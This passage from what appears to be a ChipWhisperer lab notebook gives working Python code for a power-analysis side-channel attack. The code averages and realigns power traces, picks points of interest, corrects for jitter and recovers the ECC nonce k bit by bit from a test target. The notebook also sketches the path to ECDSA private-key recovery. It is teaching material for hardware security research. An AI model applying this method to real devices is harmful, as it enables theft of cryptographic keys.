4. `XYcZ_add()` function call, 0 clock cycle realignment

We're going to look at average power segments for ones and zeros for each of these four.
We'll build a pair of 2x2x2000 multi-dimensional average arrays (one for ones, one for zeros), defined as follows:

`average array [early/late realignment] [address match index] [power sample index]`


In [None]:
length = 2000

avg_zeros = np.zeros([2,2,length])
avg_ones = np.zeros([2,2,length])

for A in range(2):
    # window start relative to the trace event (early or late realignment)
    if A == 0:
        offset = -200
    else:
        offset = 0
    for M in range(2):
        zeros = 0
        ones = 0
        # accumulate over all traces, so that the result is a true average
        azeros = np.zeros(length)
        aones = np.zeros(length)
        for T in range(len(times)):
            for i in range(0,255):
                base = int(times[T][M][i][0]*multiplier)
                data = ptraces[T].wave[base+offset+offsets[A][T][M][i]:base+offset+offsets[A][T][M][i]+length]
                if i < 124:
                    azeros += data
                    zeros += 1
                else:
                    aones += data
                    ones += 1
        avg_zeros[A][M] = azeros/zeros
        avg_ones[A][M] = aones/ones
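
The same kind of per-class averaging can be written more compactly with NumPy boolean masks. The sketch below uses small synthetic segments and a made-up bit pattern purely to show the idea. The names `demo_segments` and `demo_bits` are hypothetical, and building a real segments array would require the same realigned slicing as in the loop above.

```python
import numpy as np

# Synthetic stand-in: 6 aligned power segments of 4 samples each.
demo_segments = np.array([
    [1.0, 2.0, 3.0, 4.0],
    [1.0, 2.0, 5.0, 4.0],
    [1.0, 2.0, 3.0, 4.0],
    [1.0, 2.0, 5.0, 4.0],
    [1.0, 2.0, 3.0, 4.0],
    [1.0, 2.0, 5.0, 4.0],
])
demo_bits = np.array([0, 1, 0, 1, 0, 1])  # made-up bit processed in each segment

demo_avg_zeros = demo_segments[demo_bits == 0].mean(axis=0)
demo_avg_ones = demo_segments[demo_bits == 1].mean(axis=0)
demo_diff = demo_avg_zeros - demo_avg_ones

# Only sample 2 differs between the two classes in this toy data.
assert demo_diff.tolist() == [0.0, 0.0, -2.0, 0.0]
```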


#### And now we plot:
Here is where we hope to find, in at least some of our averages, some power signature which leaks information on whether the target is processing a one or a zero.

Recall there are 4 different sets of averages, and so 4 different plots to consider. Play with the A and M variables to see each of the sets, or skip ahead to the interactive plot.

In [None]:
from bokeh.models import tools

A = 1     # choose 0 or 1 (early or late realignment)
M = 0   # choose 0 or 1 (first or second function call)
start = 0
stop = 2000
avgplot = figure(plot_width=1800)
avgplot.add_tools(tools.HoverTool())

xrange = range(start, stop)

# average ones:
avgplot.line(xrange, avg_ones[A][M][start:stop], line_color='red')

# average zeros:
avgplot.line(xrange, avg_zeros[A][M][start:stop], line_color='blue')

# difference between average ones and average zeros:
avgplot.line(xrange, avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop], line_color='purple')


In [None]:
show(avgplot)

The interactive plot that follows makes it easier to explore the averages and find potential markers for each of the four sets of trace segments:

In [None]:
def update_plot(realignment=0, function_call=0, start=0, stop=2000, show_diffs=1, show_avg=0, show_raw=1):
    A = realignment
    M = function_call
    
    xrange = range(start,stop)
    
    ao.data_source.data['x'] = xrange
    az.data_source.data['x'] = xrange
    ad.data_source.data['x'] = xrange
    raw1.data_source.data['x'] = xrange
    raw2.data_source.data['x'] = xrange
    raw3.data_source.data['x'] = xrange
    
    if show_avg:
        ao.data_source.data['y'] = avg_ones[A][M][start:stop]
        az.data_source.data['y'] = avg_zeros[A][M][start:stop]
    else:
        ao.data_source.data['y'] = np.zeros(stop-start)
        az.data_source.data['y'] = np.zeros(stop-start)

    if show_diffs:
        ad.data_source.data['y'] = avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop]
    else:
        ad.data_source.data['y'] = np.zeros(stop-start)

    if show_raw:
        if A==0:
            rawstart = -200
        else:
            rawstart = 0
        raw1start = int(times[1][M][10][0]*multiplier)+offsets[A][1][M][10]+rawstart+start
        raw2start = int(times[2][M][10][0]*multiplier)+offsets[A][2][M][10]+rawstart+start
        raw3start = int(times[3][M][10][0]*multiplier)+offsets[A][3][M][10]+rawstart+start
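        # rawNstart already includes `start`, so the slice length must be stop-start to match xrange:
        raw1.data_source.data['y'] = ptraces[1].wave[raw1start:raw1start+stop-start]
        raw2.data_source.data['y'] = ptraces[2].wave[raw2start:raw2start+stop-start]
        raw3.data_source.data['y'] = ptraces[3].wave[raw3start:raw3start+stop-start]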
    else:
        raw1.data_source.data['y'] = np.zeros(stop-start)
        raw2.data_source.data['y'] = np.zeros(stop-start)
        raw3.data_source.data['y'] = np.zeros(stop-start)

    push_notebook()

In [None]:
from ipywidgets import interact, Layout
from bokeh.io import push_notebook
from bokeh.models import tools

output_notebook(INLINE)
avgplot = figure(plot_width=2000)
avgplot.add_tools(tools.HoverTool())

A=0
M=0
start = 0
stop = 2000

xrange = range(start,stop)
ao = avgplot.line(xrange, avg_ones[A][M][start:stop], line_color='red')
az = avgplot.line(xrange, avg_zeros[A][M][start:stop], line_color='blue')
ad = avgplot.line(xrange, avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop], line_color='purple', line_width=2)

if A==0:
    rawstart = -200
else:
    rawstart = 0

raw1start = int(times[1][M][10][0]*multiplier)+offsets[A][1][M][10]+rawstart+start
raw2start = int(times[2][M][10][0]*multiplier)+offsets[A][2][M][10]+rawstart+start
raw3start = int(times[3][M][10][0]*multiplier)+offsets[A][3][M][10]+rawstart+start

raw1 = avgplot.line(xrange, ptraces[1].wave[raw1start:raw1start+stop], line_color='red')
raw2 = avgplot.line(xrange, ptraces[2].wave[raw2start:raw2start+stop], line_color='blue')
raw3 = avgplot.line(xrange, ptraces[3].wave[raw3start:raw3start+stop], line_color='green')


In [None]:
show(avgplot, notebook_handle=True)

In [None]:
interact(update_plot, realignment=(0,1), function_call=(0, 1), start=(0,2000), stop=(0,2000), show_diffs=(0,1), show_avg=(0,1), show_raw=(0,1))

## Selecting points of interest:
As you play with all the knobs, here's the trick: for the purposes of our attack it's only useful to consider differences between zeros and ones when they occur at times where the raw traces are well aligned.

Otherwise, we're picking up on differences which are due to the different points, not differences which are due to different values of $k$. If we averaged a much larger number of traces, it's possible that the differences which now show up when the traces are unaligned would average out to zero. But from what we know of the multiplication algorithm, the differences between 0 and 1 are going to be very small, so let's restrict our search to the regions where the raw traces are well aligned.
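
If you'd rather not judge alignment by eye, one option is to measure how much the raw segments disagree at each sample. The sketch below is not part of the original flow: `aligned_mask()` is a hypothetical helper, the data is synthetic, and the tolerance is an arbitrary value that would have to be tuned for real traces.

```python
import numpy as np

def aligned_mask(segments, tolerance):
    """Return a boolean mask of samples where the segments agree closely.

    segments:  2-D array, one realigned trace segment per row (hypothetical input)
    tolerance: largest per-sample standard deviation still considered "aligned"
    """
    spread = np.std(np.asarray(segments, dtype=float), axis=0)
    return spread < tolerance

# Synthetic demo: 3 segments that agree on samples 0-49 and disagree afterwards.
rng = np.random.default_rng(0)
common = rng.normal(0, 0.1, 100)
segments = np.tile(common, (3, 1))
segments[:, 50:] += np.array([[-0.05], [0.0], [0.05]])  # simulated disagreement

mask = aligned_mask(segments, tolerance=1e-3)
print('aligned samples:', np.count_nonzero(mask))
```

Differences between the averages would then only be considered where the mask is true.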

With this in mind, these are the start/stop ranges that we'll use for each of the four combinations of realignment point and function call, along with the thresholds that we'll use to select points of interest:

| realignment | function | start | stop | threshold |
|     :-:     |     :-:  |   -:  |   -: |     -:    |
|      0      |      0   |   0   |  230 |     2e-4  |
|      0      |      1   |   0   |  230 |     5e-5  |
|      1      |      0   |  50   |  300 |     3e-5  |
|      1      |      1   |  50   |  300 |     3e-5  |


These thresholds were picked in a somewhat ad-hoc intuitive manner. From what we know of the code, we expect the secret leakage to be limited to very few instructions, so we selected thresholds which filter all but the highest peaks, so that we don't end up with too many points of interest.

These aren't necessarily the optimal values, but as we'll soon see, they mostly work quite well. Once you've gone through the attack, come back here and experiment with different thresholds -- you may be able to improve the attack.
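
When you do come back to experiment, it helps to see how quickly the number of selected points changes with the threshold. Here is a small sketch on synthetic data (the noise level and peak heights are made up for illustration, and `count_pois()` is a hypothetical helper, not something defined elsewhere in this notebook):

```python
import numpy as np

def count_pois(diff, threshold):
    """Number of samples whose absolute difference exceeds the threshold."""
    return int(np.count_nonzero(np.abs(diff) > threshold))

# Synthetic difference-of-averages: low-level noise plus three leakage peaks.
rng = np.random.default_rng(3)
diff = rng.normal(0, 1e-5, 250)
diff[[20, 21, 200]] = [8e-5, 7e-5, -9e-5]

for threshold in (1e-5, 3e-5, 5e-5, 1e-4):
    print('threshold %.0e -> %d points of interest' % (threshold, count_pois(diff, threshold)))
```

A threshold that is too low lets noise through; one that is too high discards the real peaks.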

Also, this is why we adjusted our offsets to be positive a few cells back: otherwise, the start/stop ranges could be different from run to run. That's not necessarily a problem, but it would require you to manually select appropriate start and stop points, which could be error-prone. By adjusting the offsets, we've established a common ground, and the default settings should work every time.

For reference, here is roughly what you should see for A=1, M=1 (poi11); the start offset is set to 50 to exclude the initial peaks which are due to unaligned power samples. The two broad peaks around index 70 and 250 are the ones we are interested in.
![poi11](img/uecc_poi11.png)

In [None]:
pois = []
for A in range(len(offsets)): # iterate 2 realignment offsets
    apois = []
    for M in range(len(offsets[0][0])): # iterate 2 address matches
        # code the values from the above table:
        if [A,M] == [0,0]:
            start = 0
            stop = 230
            threshold = 2e-4
        elif [A,M] == [0,1]:
            start = 0
            stop = 230
            threshold = 5e-5
        elif [A,M] == [1,0]:
            start = 50
            stop = 300
            threshold = 3e-5
        elif [A,M] == [1,1]:
            start = 50
            stop = 300
            threshold = 3e-5

        positives = list(np.where(avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop] > threshold)[0] + start)
        negatives = list(-np.where(avg_zeros[A][M][start:stop] - avg_ones[A][M][start:stop] < -threshold)[0] - start)
        apois.append(positives+negatives)

    pois.append(apois)

The 2x2 `pois` array contains our chosen points of interest for each of the four combinations of realignment and function.
We used a little trick to grab both positive and negative differences: when the difference is negative, we make the index negative. That way, it's easy for the attack code to deal with both positive and negative differences (i.e. it will know whether to add or subtract).
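
To see the sign trick in isolation, here is a minimal sketch on a synthetic difference array. The helper name `select_signed_pois()` and the `demo_pois` variable are ours, chosen for illustration only:

```python
import numpy as np

def select_signed_pois(diff, start, stop, threshold):
    """Indices where |diff| exceeds threshold, negated where diff is negative."""
    window = diff[start:stop]
    positives = list(np.where(window > threshold)[0] + start)
    negatives = list(-(np.where(window < -threshold)[0] + start))
    return positives + negatives

# Synthetic difference-of-averages with one positive and one negative peak.
diff = np.zeros(300)
diff[70] = 4e-5
diff[250] = -6e-5

demo_pois = select_signed_pois(diff, start=50, stop=300, threshold=3e-5)
for poi in demo_pois:
    sign = '+' if poi > 0 else '-'
    print('sample %d contributes with sign %s' % (abs(poi), sign))
```

One limitation of this encoding: index 0 has no negative counterpart, so code that tests `poi > 0` will always treat a point of interest at index 0 as a negative difference.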

As a sanity check, let's see what our chosen points of interest are:

They should be similar (but likely not identical) to these:

In [None]:
#pois = [[[-6, -108, -109, -110, -111, -128], [14, 15, -1, -28, -29, -38, -39, -48, -49, -59, -69, -79, -89]], [[77, 78, 257, -80, -103, -206, -215, -259], [-71, -72, -73, -74, -251, -252, -253]]]

## Does it work?
We're finally ready to see whether all this works or not!

We'll now sum up the power measurements at each of the points of interest, for each of the bits of k, and see whether the results allow us to recover $k_r$.

Let's use an interactive plot to see the contribution of each of the 4 sets of points of interest, as well as the number of traces.

In [None]:
jitter_offsets = ([0,0], [0,0]) # this is something we'll need to compute and use later

def compute_sums(traces):
    global jitter_offsets
    sums = np.zeros([2,2,255])
    for kbit in range(255):
        for t in range(traces):
            for A in range(len(offsets)): # iterate 2 realignment offsets
                for M in range(len(offsets[0][0])): # iterate 2 address matches
                    for poi in pois[A][M]:
                        if A == 0:
                            start = -200
                        else:
                            start = 0
                        data = ptraces[t].wave[int(times[t][M][kbit][0]*multiplier)+offsets[A][t][M][kbit]+abs(poi)+start+jitter_offsets[A][M]]
                        if poi > 0:
                            sums[A][M][kbit] += data
                        else:
                            sums[A][M][kbit] -= data
    return sums

def calc_sumdata(poi00=1, poi01=1, poi10=1, poi11=1, traces=len(ptraces)):
    pois = [[poi00, poi01], [poi10, poi11]]
    sumdata = np.zeros(255)
    sums = compute_sums(traces)
    for i in range(2):
        for j in range(2):
            if pois[i][j]:
                sumdata += sums[i][j]
    return sumdata

def update_sumplot(poi00=1, poi01=1, poi10=1, poi11=1, traces=len(ptraces)):
    sumdata = calc_sumdata(poi00, poi01, poi10, poi11, traces)
    sumline.data_source.data['y'] = sumdata
    push_notebook()
    

In [None]:
xrange = range(255)

sumplot = figure(plot_width=1800)
sumplot.add_tools(tools.HoverTool())
sumdata = calc_sumdata(1,1,1,1,len(ptraces))
sumline=sumplot.line(xrange, sumdata, line_color="purple")

In [None]:
show(sumplot, notebook_handle=True)

In [None]:
interact(update_sumplot, poi00=(0,1), poi01=(0,1), poi10=(0,1), poi11=(0,1), traces=(0,len(ptraces)))

The $k_r$ that we are hoping to retrieve was chosen so that it would be easy to see if we're on the right track or not:

In [None]:
hex(kr)

As you play with the knobs, you should see that the poi00 set is problematic in three ways:
1. It does not appear to catch the lone 0 bit (4th bit from MSB);
2. The curve falls from high to low at index 128, whereas $k_r$'s block of zeros starts at index 124;
3. The curve jumps around a fair bit during the long strings of ones and zeros, even when all the traces are used.

The poi00 set contains points of interest that were captured starting at 200 cycles before the first function call in the main loop; this may actually be catching instructions that were running in the *previous* iteration of the loop.

In contrast, the poi01 set seems to work extremely well: it has none of the above issues, and it appears to accurately identify all the bits even with a single trace. The poi10 and poi11 sets also work well, but it's hard to determine whether or not they help, or whether it's better to use just poi01.

Before we move onto the full attack, let's try a less regular $k_r$, with a pattern which also allows us to distinguish the first and last bits. This time we'll capture just 20 traces, just to save time.

In [None]:
kr = 0xf0ccccccccccccccccccccccccccccccaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0f
k = input_k(kr)

In [None]:
# This is the same code we used earlier to capture the traces and realign the trace segments.
# Let's make it into a function so we can use this in the final attack without copy/pasting it again:

from tqdm.notebook import tnrange
import numpy as np
def get_traces(traces=20):
    ptraces = []
    raws = []
    
    # acquire power and debug traces:
    for t in tnrange(traces, desc='Capturing traces'):
        Px, Py = new_point()
        trace.arm_trace()
        ptrace = capture_ecc_trace(k, Px, Py)
        ptraces.append(ptrace)
        while trace.fifo_empty(): pass
        raws.append(trace.read_capture_data())

    # convert debug traces into timestamps:
    times = []
    for i in range(len(raws)):
        times_both_markers = trace.get_rule_match_times(raws[i], rawtimes=False, verbose=False)
        assert len(times_both_markers) == 510, 'Got %d markers, expected 510' % len(times_both_markers)
        times_p1 = times_both_markers[::2]
        times_p2 = times_both_markers[1::2]
        times.append([times_p1, times_p2])

    # compute offsets:
    basesegment = 0
    offsets = np.zeros([2,len(ptraces),2,255], np.int32)
    for A in range(2): # early/late realignment offset
        if A == 0:
            start = -200
            complength = 230
        else:
            start = 0
            complength = 300
        for M in range(2): # address match index
            reftrace = np.asarray(ptraces[0].wave[int(times[0][M][basesegment][0]*multiplier) + start : int(times[0][M][basesegment][0]*multiplier) + complength + start])
            for T in tnrange(len(ptraces), desc='Realigning for A=%d, M=%d' % (A,M)):
                for kbit in range(255):
                    if kbit == basesegment:
                        pass
                    else:
                        diffs = []
                        for offset in range(-100,100):
                            comptrace = np.asarray(ptraces[T].wave[int(times[T][M][kbit][0]*multiplier) + offset + start : int(times[T][M][kbit][0]*multiplier) + complength + offset + start])
                            diffs.append(np.sum(abs(reftrace-comptrace)))
                        if min(diffs) < np.average(np.asarray(diffs))*.7:
                            offsets[A][T][M][kbit] = diffs.index(min(diffs)) - 100
                        else:
                            # report the trace and bit being realigned (T and kbit, not the stale t and i):
                            print('Failure for T=%d, kbit=%d (min=%f, avg=%f)' % (T, kbit, min(diffs), np.average(np.asarray(diffs))))

    return ptraces, times, offsets

In [None]:
ptraces, times, offsets = get_traces(20)

We don't need to recalculate the points of interest - they should be the same regardless of $k_r$ (if they aren't, then we need a different attack strategy).

If you now go back up and re-run the cells which generate `sumplot`, you might be lucky and see expected results for our new $k_r$, or you might see something that looks like garbage.

## Return of the Jitter
Here's our problem: the points of interest were established for a particular trace realignment. Recall that trace realignment was necessary due to the +/- 71 clock cycle jitter in the debug trace events. Remember when I warned that we'd have to deal with jitter again... Since we are attempting to distinguish the bits of $k_r$ by looking at power samples on specific clock cycles, we *must* have perfect trace alignment for each trace capture.

If the reference trace segment used in our first trace acquisition run was at +71 cycles and the reference trace segment used in this second run is not (or vice-versa), then the points of interest will all be off by +/- 71 clock cycles. This is annoying, but it's easy to correct for (if you know what to look for). We'll go about this with a simple heuristic: try different offsets and pick the one which results in `sumplot` looking like a string of well-defined zeros and ones.

This is how we do it:
- modify `compute_sums()` to use a series of different offsets (e.g. +71, 0, -71), and save the sum results for each offset
- normalize each of the sum results to an average of zero and a range of +/-1:
    - apply a vertical shift such that the average of each sum array is 0
    - multiply by a constant so that the maximum and minimum value of each sum array is +1 and -1
- if we have the right offset, the right points of interest, and sufficient traces (and assuming that our attack works! (spoiler: it does)), then the absolute value of the resulting sum array would be a constant +1
- it follows that the sum array with the smallest variance is the best choice
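
The scoring idea in the list above can be tried on synthetic data first. This is only a sketch: `squareness_score()` is a hypothetical helper, it scales by the largest absolute value (a simplification of the scaling described above), and the "garbage" array is just Gaussian noise standing in for what a wrong offset might produce.

```python
import numpy as np

def squareness_score(sums):
    """Lower is better: variance of |normalized sums| (0 for a perfect +/-1 train)."""
    wave = np.asarray(sums, dtype=float)
    wave = wave - np.average(wave)        # shift to zero mean
    wave = wave / np.max(np.abs(wave))    # scale into [-1, +1]
    return np.var(np.abs(wave))

rng = np.random.default_rng(1)
bits = np.tile([1, 0], 127)               # synthetic, balanced bit pattern
clean = np.where(bits == 1, 5.0, -5.0) + rng.normal(0, 0.2, bits.size)
garbage = rng.normal(0, 5.0, bits.size)   # stand-in for a wrong jitter offset

print('clean: %.4f, garbage: %.4f' % (squareness_score(clean), squareness_score(garbage)))
```

The clean bit train scores much closer to zero than the noise, which is what lets us pick the offset automatically.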

What's nice about this method is that it can be run in a completely automated fashion.

Because debug trace data is sampled asynchronously to the target clock, we'll add a few more candidate offsets to our list of possible offsets.

Here's a function to automatically find the best jitter offset. It does this for each of the four sets of points of interest.

In [None]:
def find_jitter_offsets(verbose=False):
    jitter_offsets = np.zeros([2,2], np.int32)
    candidates = [-2, -1, 0, 1, 2, 69, 70, 71, 72, 73, -69, -70, -71, -72, -73]
    for A in range(2):
        for M in range(2):
            # 1. calculate sums:
            allsums = []
            if A == 0:
                start = -200
            else:
                start = 0
            for i,jitterstart in enumerate(candidates):
                sums = []
                for kbit in range(len(times[0][0])):
                    sum = 0
                    for t in range(len(ptraces)):
                        for poi in pois[A][M]:  # use the POI set that matches this (A, M) combination
                            data = ptraces[t].wave[int(times[t][M][kbit][0]*multiplier)+offsets[A][t][M][kbit]+abs(poi)+start+jitterstart]
                            if poi > 0:
                                sum += data
                            else:
                                sum -= data
                    sums.append(sum)
                allsums.append(sums)

            # 2. shift and scale:
            fixedsums = []
            for i in range(len(allsums)):
                wave = np.asarray(allsums[i][1:])
                avg = np.average(wave)
                # OG: waverange = abs(max(wave) - min(wave))
                waverange = np.average(abs(wave-avg))
                fixedsums.append((wave-avg)/waverange)

            # 3.  pick best candidate:
            scores = []
            for i in range(len(fixedsums)):
                cand = np.asarray(fixedsums[i])
                avg = np.average(cand)
                cand = np.abs(cand - avg)
                metric = np.var(cand)
                if verbose: print('%d %6f' % (i, metric))
                scores.append(metric)
            chosen = np.argmin(scores)
            print("Choosing index %d: offset=%d for A=%d, M=%d" % (chosen, candidates[chosen], A, M))
            jitter_offsets[A][M] = candidates[chosen]
    return jitter_offsets


In [None]:
jitter_offsets = find_jitter_offsets()

If you now go back and re-run the cell for the interactive `sumplot` display (which automatically uses this computed jitter offset), you should see nice results again.

You should see something like this when poi01 is selected:

![poi11](img/bit_train.png)

If you don't see this, you can either:
- try again with a fresh set of traces;
- try the suggested `poi` values;
- try other `jitter_offsets` values.

If you don't resolve this and simply continue the notebook, the attack will likely not work for you.

Assuming you do have a nice train of ones and zeros, here are some observations that you should be able to make:

- the poi01 results, which previously looked so good with long strings of constant 1's and 0's, don't look as good anymore;
- poi11 gives the best result (although on Husky, poi01 can work better);
- the repeated 0xc's and 0xa's are clear;
- we have no useful information for the first (most significant) bit, because it gives a very different score;
- there is no information at all for the last (least significant) bit.

It's easy to understand why the last bit is missing: we collected 255 timestamps for each function call, not 256, because the last bit is processed outside of the main loop.

But it doesn't matter: we now have a mechanism to retrieve 254 bits, and we only need to guess 2 bits. We can brute-force that very easily.  **We have a viable attack!**

# The Attack
This time let's play for real: we'll generate a random $k$ and see whether our attack can retrieve it.

If you have a CW-lite, you may choose to skip executing all of the preceding profiling steps and jump right to here, by using the example `pois` array that is defined earlier.

In [None]:
import numpy as np

In [None]:
k = random_k()
kr = regularized_k(k)
hex(k), hex(kr)

In [None]:
traces = 20
ptraces, times, offsets = get_traces(traces)
jitter_offsets = find_jitter_offsets()

Each time we acquire a set of traces, we must guess at the correct jitter offset.

(If you run trace collection a bunch of times, you may observe that the jitter offset appears to always be the same, but trust me, *it does sometimes change!*)

Let's visualize the attack results (you can also go back to the `sumplot` cells if you want, this is for convenience).

You may want to adjust the arguments to `calc_sumdata()` if your earlier results suggested that a different POI works better than poi11.

In [None]:
from bokeh.plotting import figure, show
from bokeh.io import output_notebook
from bokeh.resources import INLINE
from bokeh.models import Span, tools

output_notebook(INLINE)

xrange = range(254)

attackplot = figure(plot_width=1800)
attackplot.add_tools(tools.HoverTool())
attackplot.line(xrange, calc_sumdata(0,0,0,1,len(ptraces))[1:], line_color="purple")


In [None]:
show(attackplot)

Based on previous results, we chose to use only the poi11 (A=1, M=1) results. You can experiment with the other components by changing the arguments to the `calc_sumdata()` call.

The plot above should look like a series of nicely distinguished 1's and 0's, like this (since `k` is random, your plot will not look exactly like this one; what you should find is a clear distinction between ones and zeros):

![poi11](img/attack_plot.png)

If your plot looks good, proceed to guessing all the bits.

Otherwise, you can try a different POI set, different values for `jitter_offsets`, or simply try a fresh trace acquisition.

In [None]:
sumdata = calc_sumdata(0,0,0,1,traces)[1:]
sumdata -= np.average(sumdata)

In [None]:
# guess all bits from waveform:
guess = ''
for i in range(254):
    if sumdata[i] > 0:
        guess += '1'
    else:
        guess += '0'

In [None]:
# first and last bit are unknown, so enumerate the possibilities:
guesses = []
for first in (['0', '1']):
    for last in (['0', '1']):
        guesses.append(int(first + guess + last, 2))

In [None]:
kr = regularized_k(k)
if kr in guesses:
    print('Guessed right!')
else:
    print('Attack failed.')
    print('Guesses: %s' % hex(guesses[0]))
    print('         %s' % hex(guesses[1]))
    print('         %s' % hex(guesses[2]))
    print('         %s' % hex(guesses[3]))
    print('Correct: %s' % hex(kr))
    wrong_bits = []
    for kbit in range(1,255):  # cover all 254 guessed bits (guess[0] through guess[253])
        if int(guess[kbit-1]) != ((kr >> (255-kbit)) & 1):
            wrong_bits.append(255-kbit)
    print('%d wrong bits: %s' % (len(wrong_bits), wrong_bits))

The attack should have succeeded. The attack does occasionally fail, usually because incorrect offset guesses are made (in which case the results look really bad - about half the bits are guessed wrong, so no better than random guessing), but with 20 traces it should succeed most of the time.

The last step is to see how well the attack works as we reduce the number of traces used.

Note that we're cheating a *little bit* here because the attacks with fewer traces are still using the offsets that were computed from **all** of the captured traces. But the leakage is still there and could still be found if fewer traces had been captured; we would just have had to work harder at finding it (i.e. use a better offset guessing algorithm).

In [None]:
for attack_traces in range(traces,0,-1):   
    print('Attacking with %d traces... ' % attack_traces,  end='')
    
    sumdata = calc_sumdata(0,0,0,1,attack_traces)[1:]
    sumdata -= np.average(sumdata)

    # guess all bits from waveform:
    guess = ''
    for i in range(254):
        if sumdata[i] > 0:
            guess += '1'
        else:
            guess += '0'

    # first and last bit are unknown, so enumerate the possibilities:
    guesses = []
    for first in (['0', '1']):
        for last in (['0', '1']):
            guesses.append(int(first + guess + last, 2))

    kr = regularized_k(k)
    if kr in guesses:
        print('Success!')
    else:
        wrong_bits = []
        for kbit in range(1,255):  # cover all 254 guessed bits (guess[0] through guess[253])
            if int(guess[kbit-1]) != ((kr >> (255-kbit)) & 1):
                wrong_bits.append(255-kbit)
        print('FAILED. %d bits are wrong: %s' % (len(wrong_bits), wrong_bits))

# Next steps

If you iterate the above with different random $k$, you should find the attack usually succeeds with as few as 6 to 8 traces.

If you try a few times and repeatedly have results worse than described here, it's possible you were unlucky in choosing the points of interest; see what happens if you repeat the attack with these:

In [None]:
pois = [[[-6, -108, -109, -110, -111, -128], [14, 15, -1, -28, -29, -38, -39, -48, -49, -59, -69, -79, -89]], [[77, 78, 257, -80, -103, -206, -215, -259], [-71, -72, -73, -74, -251, -252, -253]]]

With CW-Husky, best results were obtained with these values for poi01:

`[33, 34, 35, -38, -47, -48, -58, -67, -68, -77, -78, -87, -88, -98, -107, -108]`

It may also be possible to refine the attack (e.g. finding the very best POI). This attack uses an ad-hoc approach which is able to find fairly good POI (at least most of the time), but these are by no means guaranteed to be optimal. Sometimes you may get lucky: the best result seen from running this notebook is a successful 2-trace attack. This is tantalizingly close to a single-trace attack!

With this attack, success with a single trace is a big deal. This is because this attack requires that all traces use the same $k$. But in ECDSA, $k$ is a nonce -- it's not supposed to be used more than once. So this attack is not entirely realistic if it requires multiple traces. But it does show how much margin there is for a single-trace attack to work. And that's not all: notice that the single trace results tend to have as few as 40 wrong bit guesses. This suggests that many of the bits could be reliably guessed. If we can determine with high probability which bits can be guessed correctly, the **Hidden Number Problem** (HNP) can be applied.
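
One plausible way to decide which bits can be trusted (untested on real traces, so treat it as a starting point only) is to use the distance of each summed value from the decision threshold as a confidence score. The sketch below uses synthetic data; `guess_with_confidence()` and its `keep_fraction` parameter are hypothetical and not tuned.

```python
import numpy as np

def guess_with_confidence(sumdata, keep_fraction=0.5):
    """Guess each bit from the sign of the centered sum; flag the most confident ones.

    keep_fraction is an arbitrary illustrative choice, not a tuned value.
    """
    centered = np.asarray(sumdata, dtype=float)
    centered = centered - np.average(centered)
    guesses = (centered > 0).astype(int)
    margin = np.abs(centered)                        # distance from the threshold
    cutoff = np.quantile(margin, 1.0 - keep_fraction)
    confident = margin >= cutoff
    return guesses, confident

# Synthetic single-trace-like data: true bits buried in heavy noise.
rng = np.random.default_rng(2)
true_bits = rng.integers(0, 2, 254)
noisy_sums = np.where(true_bits == 1, 1.0, -1.0) + rng.normal(0, 1.0, 254)

guesses, confident = guess_with_confidence(noisy_sums)
errors_all = np.count_nonzero(guesses != true_bits)
errors_conf = np.count_nonzero(guesses[confident] != true_bits[confident])
print('%d/%d wrong overall, %d/%d wrong among confident bits'
      % (errors_all, guesses.size, errors_conf, np.count_nonzero(confident)))
```

If the error rate among the confident bits is low enough on real traces, those bits are the partial knowledge that the next step needs.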

With HNP, multiple ECDSA signatures with different $k$ are observed. If we have partial knowledge of the $k$ used for each signature, and if we observe enough signatures, the private key can be retrieved. This is left as an exercise to the reader. Recent ECC attack papers using HNP include:
- [Minerva: The curse of ECDSA nonces](https://tches.iacr.org/index.php/TCHES/article/view/8684)
- [A Side Journey to Titan: Side-Channel Attack on the Google Titan Security Key](https://ninjalab.io/wp-content/uploads/2021/01/a_side_journey_to_titan.pdf)
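
For context on why knowledge of $k$ matters so much: once the full nonce of a single ECDSA signature is known, the private key follows directly from the signing equation $s = k^{-1}(z + r d) \bmod n$. Here is a minimal sketch using modular arithmetic only. The values of `d`, `k`, `z` and `r` are toy numbers chosen for illustration (in a real signature, `r` comes from the x-coordinate of $kG$), and `pow(x, -1, n)` requires Python 3.8 or later.

```python
# Order of the NIST P-256 base point.
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

def recover_private_key(r, s, z, k):
    """Solve s = k^-1 * (z + r*d) mod n for the private key d."""
    return ((s * k - z) * pow(r, -1, n)) % n

# Toy values (hypothetical, not taken from a real signature):
d = 0x1234567890ABCDEF   # "private key"
k = 0x0FEDCBA987654321   # nonce, assumed fully recovered by the attack
z = 0xDEADBEEF           # message hash
r = 0xC0FFEE             # stand-in for the x-coordinate of k*G, mod n
s = (pow(k, -1, n) * (z + r * d)) % n   # signer's side of the equation

recovered = recover_private_key(r, s, z, k)
print(hex(recovered))
```

HNP generalizes this to the case where only part of each $k$ is known, at the cost of needing many signatures.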

Another idea to try, which may (or may not) be more realistic/useful in noisy environments, is to apply a horizontal correlation attack. See this paper for an example of a horizontal correlation attack: [Horizontal collision correlation attack on elliptic curves](https://link.springer.com/article/10.1007/s12095-014-0111-8), as well as our own [hardware ECC attack tutorial](https://github.com/newaetech/chipwhisperer-jupyter/blob/master/demos/CW305_ECC.ipynb) (requires CW305 FPGA target board).

Finally, as has been noted throughout this notebook, none of the chosen attack parameters have been proven to be optimal; see if you can do better, and if so send a pull request!